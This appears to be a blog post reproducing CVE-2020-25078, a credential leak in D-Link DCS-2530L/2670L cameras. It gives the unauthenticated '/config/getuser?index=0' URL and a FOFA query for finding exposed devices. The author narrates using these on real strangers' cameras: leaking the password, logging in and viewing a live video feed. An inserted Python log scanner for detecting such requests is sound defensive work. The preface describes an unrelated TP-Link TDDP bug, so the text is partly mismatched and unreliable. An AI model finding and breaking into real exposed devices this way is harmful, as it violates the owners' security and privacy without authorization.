Reproducing the D-Link DCS-2530L and DCS-2670L Surveillance Camera Information Disclosure Vulnerability (CVE-2020-25078)

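Preface

According to the relevant material, TDDP (TP-LINK Device Debug Protocol) is a protocol patented by TP-LINK and designed on top of UDP communication, and Google security expert Matthew Garrett found, in the TDDP protocol file on the TP-Link SR20 device, a vulnerability that can "allow arbitrary command execution from local network connections".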

Principle

CVE-2020-25078 can leak the password through the following URL:

http://xx.xx.xx.xx/config/getuser?index=0
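From the defender's side, requests to this path are easy to spot in HTTP logs. The following is an added example, not code from the original post: it scans access-log lines for requests to `/config/getuser` made without credentials. The log format, the sample lines, the reverse-proxy deployment and the function name `find_getuser_hits` are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample: combined-format access log lines, as a reverse proxy in
# front of the cameras might write them (assumed deployment, not from the post).
SAMPLE_LOG = """\
198.51.100.7 - - [21/Dec/2023:10:01:45 +0000] "GET /config/getuser?index=0 HTTP/1.1" 200 48 "-" "curl/8.4.0"
198.51.100.7 - - [21/Dec/2023:10:01:46 +0000] "GET /config/getuser?index=1 HTTP/1.1" 200 48 "-" "curl/8.4.0"
192.0.2.10 - admin [21/Dec/2023:10:02:10 +0000] "GET /config/getuser?index=0 HTTP/1.1" 200 48 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Dec/2023:10:03:00 +0000] "GET /%63onfig/GetUser?index=0 HTTP/1.1" 404 0 "-" "python-requests/2.31"
192.0.2.10 - - [21/Dec/2023:10:04:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')


def find_getuser_hits(log_text):
    """Map source IP -> [(timestamp, verdict)] for unauthenticated getuser requests."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        parts = urlsplit(m["target"])
        # Decode percent-escapes and fold case so obfuscated variants still
        # match (a conservative choice; the device may be case-sensitive).
        path = unquote(parts.path).lower().rstrip("/")
        if path != "/config/getuser" or "index" not in parse_qs(parts.query):
            continue
        if m["user"] != "-":
            continue  # credentials were presented; not the unauthenticated case
        # A 200 means the camera answered, so the account data was returned.
        verdict = "disclosed" if m["status"] == "200" else "probe"
        hits[m["src"]].append((m["ts"], verdict))
    return dict(hits)


if __name__ == "__main__":
    for src, events in find_getuser_hits(SAMPLE_LOG).items():
        print(src, events)
```

Any source with a `disclosed` verdict means the camera's credentials should be treated as exposed and rotated.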

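Reproduction

Since I don't have a DCS device on hand and it isn't easy to emulate one either, I went straight to IPs found through a FOFA search and tested against those.

FOFA search: app=app="D_Link-DCS-2670L"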

[![image-20231221100145549](/picture/D-Link DCS-2530L和DCS-2670L监控信息泄露漏洞(CVE-2020-25078)复现/image-20231221100145549.png)](https://springbird3.oss-cn-chengdu.aliyuncs.com/lianxiang/20221022230518.png)

Found one, so I went straight to leaking it.

[![image-20231221100254982](/picture/D-Link DCS-2530L和DCS-2670L监控信息泄露漏洞(CVE-2020-25078)复现/image-20231221100254982.png)](https://springbird3.oss-cn-chengdu.aliyuncs.com/lianxiang/20221022230518.png)

The password came straight out, and then we can simply go and log in.

[![image-20231221100327310](/picture/D-Link DCS-2530L和DCS-2670L监控信息泄露漏洞(CVE-2020-25078)复现/image-20231221100327310.png)](https://springbird3.oss-cn-chengdu.aliyuncs.com/lianxiang/20221022230518.png)

Then the video feed came up, which is quite frightening.

[![image-20231221100425210](/picture/D-Link DCS-2530L和DCS-2670L监控信息泄露漏洞(CVE-2020-25078)复现/image-20231221100425210.png)](https://springbird3.oss-cn-chengdu.aliyuncs.com/lianxiang/20221022230518.png)